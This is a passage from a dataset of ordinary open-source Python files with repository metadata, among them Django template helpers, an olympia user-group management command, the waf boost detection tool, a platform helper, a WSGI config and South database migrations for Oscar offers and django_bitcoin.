return render_template_block_nodelist(getattr(node, key), block, context)
except:
pass
for node in nodelist:
if isinstance(node, ExtendsNode):
try:
return render_template_block(node.get_parent(context), block, context)
except BlockNotFound:
pass
raise BlockNotFound
def render_block_to_string(template_name, block, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders the given block with the given dictionary as
context. Returns a string.
"""
dictionary = dictionary or {}
t = get_template(template_name)
if context_instance:
context_instance.update(dictionary)
else:
context_instance = Context(dictionary)
t.render(context_instance)
return render_template_block(t, block, context_instance)
def direct_block_to_template(request, template, block, extra_context=None, mimetype=None, **kwargs):
"""
Render a given block in a given template with any extra URL parameters in the context as
``{{ params }}``.
"""
if extra_context is None:
extra_context = {}
dictionary = {'params': kwargs}
for key, value in extra_context.items():
if callable(value):
dictionary[key] = value()
else:
dictionary[key] = value
c = RequestContext(request, dictionary)
t = get_template(template)
t.render(c)
return HttpResponse(render_template_block(t, block, c), mimetype=mimetype)
|
SpreadBand/SpreadBand
|
utils/template.py
|
Python
|
agpl-3.0
| 2,505
|
from django.core.management.base import BaseCommand, CommandError
import commonware.log
from olympia.access.models import Group, GroupUser
from olympia.users.models import UserProfile
class Command(BaseCommand):
help = ('Remove a user from a group. Syntax: \n'
' ./manage.py removeuserfromgroup <user_id|email> <group_id>')
log = commonware.log.getLogger('z.users')
def handle(self, *args, **options):
try:
do_removeuser(args[0], args[1])
msg = 'Removing {user} from {group}\n'.format(user=args[0],
group=args[1])
self.log.info(msg)
self.stdout.write(msg)
except IndexError:
raise CommandError(self.help)
def do_removeuser(user, group):
try:
if '@' in user:
user = UserProfile.objects.get(email=user)
elif user.isdigit():
user = UserProfile.objects.get(pk=user)
else:
raise CommandError('Unknown input for user.')
if group.isdigit():
group = Group.objects.get(pk=group)
else:
raise CommandError('Group must be a valid ID.')
# Doesn't actually check if the user was in the group or not.
GroupUser.objects.filter(user=user, group=group).delete()
# Help django-cache-machine invalidate its cache (it has issues with
# M2Ms).
Group.objects.invalidate(*user.groups.all())
except UserProfile.DoesNotExist:
raise CommandError('User ({user}) does not exist.'.format(user=user))
except Group.DoesNotExist:
raise CommandError('Group ({group}) does not exist.'
.format(group=group))
|
mstriemer/olympia
|
src/olympia/zadmin/management/commands/removeuserfromgroup.py
|
Python
|
bsd-3-clause
| 1,740
|
from MirrorAI.io.read import readCIFAR
import os
def main():
dir_data = os.path.join("..",
"data/cifar/cifar-10-batches-py"
)
f_meta = os.path.join(dir_data, "batches.meta")
data_files = [
os.path.join(dir_data, "data_batch_1"),
os.path.join(dir_data, "data_batch_2")
]
answer = readCIFAR(f_meta, data_files)
assert sorted(answer.keys()) == [
'batch_label',
'data',
'filenames',
'label_names',
'labels',
'num_cases_per_batch',
'num_vis']
assert len(answer['data']) == 20000
assert answer['data'][0].shape == (32, 32, 3)
print(123)
if __name__ == '__main__':
main()
|
yuhangwang/MirrorAI
|
mirror-ai/app/py/proxyMirrorAI.py
|
Python
|
mit
| 708
|
#!/usr/bin/env python
# encoding: utf-8
#
# partially based on boost.py written by Gernot Vormayr
# written by Ruediger Sonderfeld <ruediger@c-plusplus.de>, 2008
# modified by Bjoern Michaelsen, 2008
# modified by Luca Fossati, 2008
# rewritten for waf 1.5.1, Thomas Nagy, 2008
# rewritten for waf 1.6.2, Sylvain Rouquette, 2011
'''
This is an extra tool, not bundled with the default waf binary.
To add the boost tool to the waf file:
$ ./waf-light --tools=compat15,boost
or, if you have waf >= 1.6.2
$ ./waf update --files=boost
When using this tool, the wscript will look like:
def options(opt):
opt.load('compiler_cxx boost')
def configure(conf):
conf.load('compiler_cxx boost')
conf.check_boost(lib='system filesystem')
def build(bld):
bld(source='main.cpp', target='app', use='BOOST')
Options are generated, in order to specify the location of boost includes/libraries.
The `check_boost` configuration function allows to specify the used boost libraries.
It can also provide default arguments to the --boost-static and --boost-mt command-line arguments.
Everything will be packaged together in a BOOST component that you can use.
When using MSVC, a lot of compilation flags need to match your BOOST build configuration:
- you may have to add /EHsc to your CXXFLAGS or define boost::throw_exception if BOOST_NO_EXCEPTIONS is defined.
Errors: C4530
- boost libraries will try to be smart and use the (pretty but often not useful) auto-linking feature of MSVC
So before calling `conf.check_boost` you might want to disabling by adding:
conf.env.DEFINES_BOOST += ['BOOST_ALL_NO_LIB']
Errors:
- boost might also be compiled with /MT, which links the runtime statically.
If you have problems with redefined symbols,
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
self.env['CXXFLAGS_%s' % var] += ['/MD', '/EHsc']
Passing `--boost-linkage_autodetect` might help ensuring having a correct linkage in some basic cases.
'''
import sys
import re
from waflib import Utils, Logs, Errors
from waflib.Configure import conf
BOOST_LIBS = ['/usr/lib', '/usr/local/lib', '/opt/local/lib', '/sw/lib', '/lib', '/usr/lib/x86_64-linux-gnu', '/usr/lib/i386-linux-gnu', '/usr/local/ndn/lib']
BOOST_INCLUDES = ['/usr/include', '/usr/local/include', '/opt/local/include', '/sw/include', '/usr/local/ndn/include']
BOOST_VERSION_FILE = 'boost/version.hpp'
BOOST_VERSION_CODE = '''
#include <iostream>
#include <boost/version.hpp>
int main() { std::cout << BOOST_LIB_VERSION << ":" << BOOST_VERSION << std::endl; }
'''
BOOST_SYSTEM_CODE = '''
#include <boost/system/error_code.hpp>
int main() { boost::system::error_code c; }
'''
BOOST_THREAD_CODE = '''
#include <boost/thread.hpp>
int main() { boost::thread t; }
'''
# toolsets from {boost_dir}/tools/build/v2/tools/common.jam
PLATFORM = Utils.unversioned_sys_platform()
detect_intel = lambda env: (PLATFORM == 'win32') and 'iw' or 'il'
detect_clang = lambda env: (PLATFORM == 'darwin') and 'clang-darwin' or 'clang'
detect_mingw = lambda env: (re.search('MinGW', env.CXX[0])) and 'mgw' or 'gcc'
BOOST_TOOLSETS = {
'borland': 'bcb',
'clang': detect_clang,
'como': 'como',
'cw': 'cw',
'darwin': 'xgcc',
'edg': 'edg',
'g++': detect_mingw,
'gcc': detect_mingw,
'icpc': detect_intel,
'intel': detect_intel,
'kcc': 'kcc',
'kylix': 'bck',
'mipspro': 'mp',
'mingw': 'mgw',
'msvc': 'vc',
'qcc': 'qcc',
'sun': 'sw',
'sunc++': 'sw',
'tru64cxx': 'tru',
'vacpp': 'xlc'
}
def options(opt):
opt = opt.add_option_group('Boost Options')
opt.add_option('--boost-includes', type='string',
default='', dest='boost_includes',
help='''path to the directory where the boost includes are, e.g., /path/to/boost_1_55_0/stage/include''')
opt.add_option('--boost-libs', type='string',
default='', dest='boost_libs',
help='''path to the directory where the boost libs are, e.g., /path/to/boost_1_55_0/stage/lib''')
opt.add_option('--boost-static', action='store_true',
default=False, dest='boost_static',
help='link with static boost libraries (.lib/.a)')
opt.add_option('--boost-mt', action='store_true',
default=False, dest='boost_mt',
help='select multi-threaded libraries')
opt.add_option('--boost-abi', type='string', default='', dest='boost_abi',
help='''select libraries with tags (dgsyp, d for debug), see doc Boost, Getting Started, chapter 6.1''')
opt.add_option('--boost-linkage_autodetect', action="store_true", dest='boost_linkage_autodetect',
help="auto-detect boost linkage options (don't get used to it / might break other stuff)")
opt.add_option('--boost-toolset', type='string',
default='', dest='boost_toolset',
help='force a toolset e.g. msvc, vc90, gcc, mingw, mgw45 (default: auto)')
py_version = '%d%d' % (sys.version_info[0], sys.version_info[1])
opt.add_option('--boost-python', type='string',
default=py_version, dest='boost_python',
help='select the lib python with this version (default: %s)' % py_version)
@conf
def __boost_get_version_file(self, d):
dnode = self.root.find_dir(d)
if dnode:
return dnode.find_node(BOOST_VERSION_FILE)
return None
@conf
def boost_get_version(self, d):
"""silently retrieve the boost version number"""
node = self.__boost_get_version_file(d)
if node:
try:
txt = node.read()
except (OSError, IOError):
Logs.error("Could not read the file %r" % node.abspath())
else:
re_but1 = re.compile('^#define\\s+BOOST_LIB_VERSION\\s+"(.+)"', re.M)
m1 = re_but1.search(txt)
re_but2 = re.compile('^#define\\s+BOOST_VERSION\\s+(\\d+)', re.M)
m2 = re_but2.search(txt)
if m1 and m2:
return (m1.group(1), m2.group(1))
return self.check_cxx(fragment=BOOST_VERSION_CODE, includes=[d], execute=True, define_ret=True).split(":")
@conf
def boost_get_includes(self, *k, **kw):
includes = k and k[0] or kw.get('includes', None)
if includes and self.__boost_get_version_file(includes):
return includes
for d in Utils.to_list(self.environ.get('INCLUDE', '')) + BOOST_INCLUDES:
if self.__boost_get_version_file(d):
return d
if includes:
self.end_msg('headers not found in %s' % includes)
self.fatal('The configuration failed')
else:
self.end_msg('headers not found, please provide a --boost-includes argument (see help)')
self.fatal('The configuration failed')
@conf
def boost_get_toolset(self, cc):
toolset = cc
if not cc:
build_platform = Utils.unversioned_sys_platform()
if build_platform in BOOST_TOOLSETS:
cc = build_platform
else:
cc = self.env.CXX_NAME
if cc in BOOST_TOOLSETS:
toolset = BOOST_TOOLSETS[cc]
return isinstance(toolset, str) and toolset or toolset(self.env)
@conf
def __boost_get_libs_path(self, *k, **kw):
''' return the lib path and all the files in it '''
if 'files' in kw:
return self.root.find_dir('.'), Utils.to_list(kw['files'])
libs = k and k[0] or kw.get('libs', None)
if libs:
path = self.root.find_dir(libs)
files = path.ant_glob('*boost_*')
if not libs or not files:
for d in Utils.to_list(self.environ.get('LIB', [])) + BOOST_LIBS:
path = self.root.find_dir(d)
if path:
files = path.ant_glob('*boost_*')
if files:
break
path = self.root.find_dir(d + '64')
if path:
files = path.ant_glob('*boost_*')
if files:
break
if not path:
if libs:
self.end_msg('libs not found in %s' % libs)
self.fatal('The configuration failed')
else:
self.end_msg('libs not found, please provide a --boost-libs argument (see help)')
self.fatal('The configuration failed')
self.to_log('Found the boost path in %r with the libraries:' % path)
for x in files:
self.to_log(' %r' % x)
return path, files
@conf
def boost_get_libs(self, *k, **kw):
'''
return the lib path and the required libs
according to the parameters
'''
path, files = self.__boost_get_libs_path(**kw)
t = []
if kw.get('mt', False):
t.append('mt')
if kw.get('abi', None):
t.append(kw['abi'])
tags = t and '(-%s)+' % '-'.join(t) or ''
toolset = self.boost_get_toolset(kw.get('toolset', ''))
toolset_pat = '(-%s[0-9]{0,3})+' % toolset
version = '(-%s)+' % self.env.BOOST_VERSION
def find_lib(re_lib, files):
for file in files:
if re_lib.search(file.name):
self.to_log('Found boost lib %s' % file)
return file
return None
def format_lib_name(name):
if name.startswith('lib') and self.env.CC_NAME != 'msvc':
name = name[3:]
return name[:name.rfind('.')]
libs = []
for lib in Utils.to_list(k and k[0] or kw.get('lib', None)):
py = (lib == 'python') and '(-py%s)+' % kw['python'] or ''
# Trying libraries, from most strict match to least one
for pattern in ['boost_%s%s%s%s%s' % (lib, toolset_pat, tags, py, version),
'boost_%s%s%s%s' % (lib, tags, py, version),
'boost_%s%s%s' % (lib, tags, version),
# Give up trying to find the right version
'boost_%s%s%s%s' % (lib, toolset_pat, tags, py),
'boost_%s%s%s' % (lib, tags, py),
'boost_%s%s' % (lib, tags)]:
self.to_log('Trying pattern %s' % pattern)
file = find_lib(re.compile(pattern), files)
if file:
libs.append(format_lib_name(file.name))
break
else:
self.end_msg('lib %s not found in %s' % (lib, path.abspath()))
self.fatal('The configuration failed')
return path.abspath(), libs
@conf
def check_boost(self, *k, **kw):
"""
Initialize boost libraries to be used.
Keywords: you can pass the same parameters as with the command line (without "--boost-").
Note that the command line has the priority, and should preferably be used.
"""
if not self.env['CXX']:
self.fatal('load a c++ compiler first, conf.load("compiler_cxx")')
params = {'lib': k and k[0] or kw.get('lib', None)}
for key, value in self.options.__dict__.items():
if not key.startswith('boost_'):
continue
key = key[len('boost_'):]
params[key] = value and value or kw.get(key, '')
var = kw.get('uselib_store', 'BOOST')
self.start_msg('Checking boost includes')
self.env['INCLUDES_%s' % var] = inc = self.boost_get_includes(**params)
versions = self.boost_get_version(inc)
self.env.BOOST_VERSION = versions[0]
self.env.BOOST_VERSION_NUMBER = int(versions[1])
self.end_msg("%d.%d.%d" % (int(versions[1]) / 100000,
int(versions[1]) / 100 % 1000,
int(versions[1]) % 100))
if Logs.verbose:
Logs.pprint('CYAN', ' path : %s' % self.env['INCLUDES_%s' % var])
if not params['lib']:
return
self.start_msg('Checking boost libs')
suffix = params.get('static', None) and 'ST' or ''
path, libs = self.boost_get_libs(**params)
self.env['%sLIBPATH_%s' % (suffix, var)] = [path]
self.env['%sLIB_%s' % (suffix, var)] = libs
self.end_msg('ok')
if Logs.verbose:
Logs.pprint('CYAN', ' path : %s' % path)
Logs.pprint('CYAN', ' libs : %s' % libs)
def try_link():
if 'system' in params['lib']:
self.check_cxx(
fragment=BOOST_SYSTEM_CODE,
use=var,
execute=False,
)
if 'thread' in params['lib']:
self.check_cxx(
fragment=BOOST_THREAD_CODE,
use=var,
execute=False,
)
if params.get('linkage_autodetect', False):
self.start_msg("Attempting to detect boost linkage flags")
toolset = self.boost_get_toolset(kw.get('toolset', ''))
if toolset in ['vc']:
# disable auto-linking feature, causing error LNK1181
# because the code wants to be linked against
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
# if no dlls are present, we guess the .lib files are not stubs
has_dlls = False
for x in Utils.listdir(path):
if x.endswith(self.env.cxxshlib_PATTERN % ''):
has_dlls = True
break
if not has_dlls:
self.env['STLIBPATH_%s' % var] = [path]
self.env['STLIB_%s' % var] = libs
del self.env['LIB_%s' % var]
del self.env['LIBPATH_%s' % var]
# we attempt to play with some known-to-work CXXFLAGS combinations
for cxxflags in (['/MD', '/EHsc'], []):
self.env.stash()
self.env["CXXFLAGS_%s" % var] += cxxflags
try:
try_link()
self.end_msg("ok: winning cxxflags combination: %s" % (self.env["CXXFLAGS_%s" % var]))
e = None
break
except Errors.ConfigurationError as exc:
self.env.revert()
e = exc
if e is not None:
self.end_msg("Could not auto-detect boost linking flags combination, you may report it to boost.py author", ex=e)
self.fatal('The configuration failed')
else:
self.end_msg("Boost linkage flags auto-detection not implemented (needed ?) for this toolchain")
self.fatal('The configuration failed')
else:
self.start_msg('Checking for boost linkage')
try:
try_link()
except Errors.ConfigurationError as e:
self.end_msg("Could not link against boost libraries using supplied options")
self.fatal('The configuration failed')
self.end_msg('ok')
|
spirosmastorakis/ndn-tools
|
.waf-tools/boost.py
|
Python
|
gpl-3.0
| 14,617
|
# coding: utf-8
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc & contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
PLATFORM_WINDOWS = 'windows'
PLATFORM_LINUX = 'linux'
PLATFORM_BSD = 'bsd'
PLATFORM_DARWIN = 'darwin'
PLATFORM_UNKNOWN = 'unknown'
def get_platform_name():
if sys.platform.startswith("win"):
return PLATFORM_WINDOWS
elif sys.platform.startswith('darwin'):
return PLATFORM_DARWIN
elif sys.platform.startswith('linux'):
return PLATFORM_LINUX
elif sys.platform.startswith(('dragonfly', 'freebsd', 'netbsd', 'openbsd', 'bsd')):
return PLATFORM_BSD
else:
return PLATFORM_UNKNOWN
__platform__ = get_platform_name()
def is_linux():
return __platform__ == PLATFORM_LINUX
def is_bsd():
return __platform__ == PLATFORM_BSD
def is_darwin():
return __platform__ == PLATFORM_DARWIN
def is_windows():
return __platform__ == PLATFORM_WINDOWS
|
snakeleon/YouCompleteMe-x64
|
third_party/ycmd/third_party/watchdog_deps/watchdog/src/watchdog/utils/platform.py
|
Python
|
gpl-3.0
| 1,497
|
"""
WSGI config for kaka project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "kaka.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
hdzierz/Kaka
|
kaka/wsgi.py
|
Python
|
gpl-2.0
| 383
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column('offer_conditionaloffer', 'start_date', 'start_datetime')
db.rename_column('offer_conditionaloffer', 'end_date', 'end_datetime')
def backwards(self, orm):
db.rename_column('offer_conditionaloffer', 'start_datetime', 'start_date')
db.rename_column('offer_conditionaloffer', 'end_datetime', 'end_date')
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'offer.shippingbenefit': {
'Meta': {'object_name': 'ShippingBenefit', '_ormbases': ['offer.Benefit']},
'benefit_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['offer.Benefit']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['offer']
|
jinnykoo/wuyisj
|
src/oscar/apps/offer/south_migrations/0018_auto__del_field_conditionaloffer_end_date__del_field_conditionaloffer_.py
|
Python
|
bsd-3-clause
| 16,241
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'DepositTransaction.confirmations'
db.add_column('django_bitcoin_deposittransaction', 'confirmations',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
# Adding field 'DepositTransaction.txid'
db.add_column('django_bitcoin_deposittransaction', 'txid',
